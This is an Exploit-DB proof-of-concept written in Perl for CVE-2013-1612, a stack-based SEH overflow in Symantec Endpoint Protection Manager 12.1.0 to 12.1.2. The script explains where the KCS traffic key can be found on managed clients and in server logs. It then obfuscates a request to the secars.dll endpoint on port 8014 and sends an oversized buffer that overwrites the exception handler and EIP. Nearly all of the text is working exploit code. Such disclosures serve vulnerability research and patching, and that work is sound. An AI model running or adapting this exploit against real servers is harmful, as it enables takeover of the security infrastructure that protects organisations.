Symantec Endpoint Protection Manager 12.1.x

## Exploit-DB mirror: http://www.exploit-db.com/sploits/33056-sepm-secars-poc-v0.3.tar.gz

#!/usr/bin/perl -w

# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC

# Date: 31 January 2013

# Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com)

# Vendor Homepage: http://http://www.symantec.com/en/uk/endpoint-protection

# Version: 12.1.0 -> 12.1.2

# Tested on: Windows 2003 Enterprise Edition SP2

# CVE : CVE-2013-1612

# More info on: http://funoverip.net/?p=1693

#

#=====================================================================================

#

# This POC code overwrite EIP with "CCCCCCCC"

#

# About KCS Key: That key is used to obfuscate traffic between client and server.

# The key is generated during SEPM installation.

# We need that key to talk with the SEPM server..

#

# Where to find KCS Key ?

# On a managed client station. Search for "Kcs" inside:

#

# - Win7/Vista/W2k8/and more :

# C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\CurrentVersion\\Data\\Config\\SyLink.xml

# - Windows XP :

# C:\\Document & Settings\\All Users\\Application Data\\Symantec\\Symantec Endpoint Protection\\

# CurrentVersion\\Data\\Config\\SyLink.xml

#

# On server side, check the logs:

# C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\data\\inbox\\log\\ersecreg.log

#=====================================================================================

use warnings;

use strict;

use IO::Socket::INET;

use SEPM::SEPM;

# SEP Manager host/ip

my $host = "192.168.60.186";

my $port = 8014;

# Kcs key

my $Kcs_hex = "85FB05B288B45D92447A3EDCBEFC434E";

# ---- config end -----

# flush after every write

$| = 1;

# Send HTTP request function

sub send_request {

my $param = shift; # URL parameters

my $post_data = shift; # POST DATA

my $sock = IO::Socket::INET->new("$host:$port");

if($sock){

print "Connected.. \n";

# HTTP request

my $req =

"POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .

"User-Agent: Smc\r\n" .

"Host: $host\r\n" .

"Content-Length: " . length($post_data) . "\r\n" .

"\r\n" .

$post_data ;

# Sending

print $sock $req;

# Read HTTP response

my $resp = '';

while(<$sock>){ $resp .=$_; }

#print $resp;

if($resp =~ /400 Bad Request/) {

print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";

}

close $sock;

}

# SEP object

my $sep = SEPM::SEPM->new();

print "[*] Target: $host:$port\n";

print "[*] KCS Key: $Kcs_hex\n";

# SEPM object for obfuscation

print "[*] Generating master encryption key\n";

$sep->genkey($Kcs_hex);

# Obfuscate URL parameters

print "[*] Encrypting URI\n";

my $h = $sep->obfuscate("l=9&action=26");

# The evil buff

print "[*] Building evil buffer\n";

my $buf =

"foo=[hex]" . # [hex] call the vulnerable parsing function

"F" x 1288 . # Junk

"B" x 8 . # Pointer to next SEH record

"CCCCCCCC". # SEH Handler, will overwrite EIP register

"D" x 500; # Trigger "Memory Access Violation" exception

# Sending request

print "[*] Sending HTTP request\n";

send_request($h, # URL parameters

$buf # post data

);

print "[*] Done\n";